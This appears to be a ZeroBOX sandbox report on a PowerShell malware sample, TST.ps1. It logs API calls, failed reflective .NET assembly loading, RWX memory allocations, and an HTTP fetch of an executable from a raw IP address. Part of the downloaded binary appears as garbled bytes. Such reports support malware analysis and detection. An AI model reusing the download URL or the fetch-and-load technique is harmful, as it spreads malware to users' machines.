popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

TST.ps1

Generic Malware Antivirus
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Aug. 13, 2024, 9:33 a.m. Aug. 13, 2024, 9:35 a.m.
Size 4.8KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 34261ad4c802d025f6ead9dd56634860
SHA256 27bd8666cfbd715fe61a6b97294c7f4f6b15e61aefc65ebe91a77e4d5c8e74fa
CRC32 9E29F94A
ssdeep 96:aZmxGUY5oPhvPFUY/D4hvPwDyDXhvPSu9IR9IX:w2B7D4BIDyDXBKasO
Yara None matched

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
147.45.44.131 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Load" with "1" argument(s): "Could not load file or assembly
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: '13312 bytes loaded from System.Management.Automation, Version=1.0.0.0, Cultur
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: e=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. An atte
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: mpt was made to load a program with an incorrect format."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:7 char:47
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + $assembly = [System.Reflection.Assembly]::Load <<<< ($fileBytes)
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: You cannot call a method on a null-valued expression.
console_handle: 0x00000017
1 1 0

WriteConsoleW

 buffer: At line:13 char:19
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: + $entryPoint.Invoke <<<< ($null, $params)
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (Invoke:String) [], RuntimeExc
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: eption
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : InvokeMethodOnNull
console_handle: 0x0000005f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x007206a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: f ›týðKlV«×C€®¯Ë²ÙŽ¾Ý0íCªåí„
crypto_handle: 0x007206a8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 8
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00720828
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://147.45.44.131/files/TTF.exe
request GET http://147.45.44.131/files/TTF.exe
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023ff000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01fb9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ed0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x023f9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05256000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05257000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 1114112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x06400000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x064d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05258000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ec7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05241000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1648
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05ed1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 00:33:33 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 12 Aug 2024 11:56:41 GMT ETag: "3400-61f7b2fb281f0" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELY6 úà" 0*JI `@  `…öHO`Œ€ `H8  H.textP) * `.rsrcŒ`,@@.reloc €2@B*IHh)ø07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
Data received
Data sent GET /files/TTF.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
host 147.45.44.131
Time & API Arguments Status Return Repeated

send

 buffer: GET /files/TTF.exe HTTP/1.1 Host: 147.45.44.131 Connection: Keep-Alive
socket: 1544
sent: 76
1 76 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Tue, 13 Aug 2024 00:33:33 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 12 Aug 2024 11:56:41 GMT ETag: "3400-61f7b2fb281f0" Accept-Ranges: bytes Content-Length: 13312 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELY6 úà" 0*JI `@  `…öHO`Œ€ `H8  H.textP) * `.rsrcŒ`,@@.reloc €2@B*IHh)ø07( }}}|(+|( *( *.s €*ªrp( -r p( -+ rp*r‰p**( *0/( }}|(+|( *( *0(o ( *ÎÐ&(! rËp(" %¢%Œ(¢o# ¥**ÎÐ&(! rÛp(" %¢%Œ(¢o# ¥(*0yÐ&(! ($ +  +Všo% rëp( ,>šo& šo' o% rýp( ,š%Œ(¢o# t X Ži2¤*0k %%r p¢%rp¢%r'p¢%rAp¢%rmp¢%rp¢%r»p¢%rÝp¢%rûp¢% r!p¢% rEp¢% rop¢*Ž( (Ð(! (( ¥*0 ™ 8Š þþÐ(! () (* }~ rp~+ ~+  ~+ o>-s, z<( 2XX(  ³( ž(- 3~ {o*- s, z~ {o&-s, z)”~  {Xo6-s, z3~  {o:,s, zPX(  TX(   ~ { 0@o.  -s, z~ {  o2-s, z øX X( 80Ð(! rÛp(" %¢%  XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(Ð(! rÛp(" %¢% XŒ(¢o# ¥(,w+Ð2(! rp(" %¢%Œ(¢%¢%Œ(¢%ŽiŒ(¢o# &~ { XŽio2-s, z (X X?Çþÿÿ ( ~ {Xo2-s, z(X(  , , Xž(- 3~ {o"- s, z~ {o-s, z~ {o3s, zÞ#& {(. (/ o0 ÞX ?oüÿÿ*A4Au( *0ô( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š(+€( š( š( +€( š(  š( +€ ( š(
received: 2720
socket: 1544
1 2720 0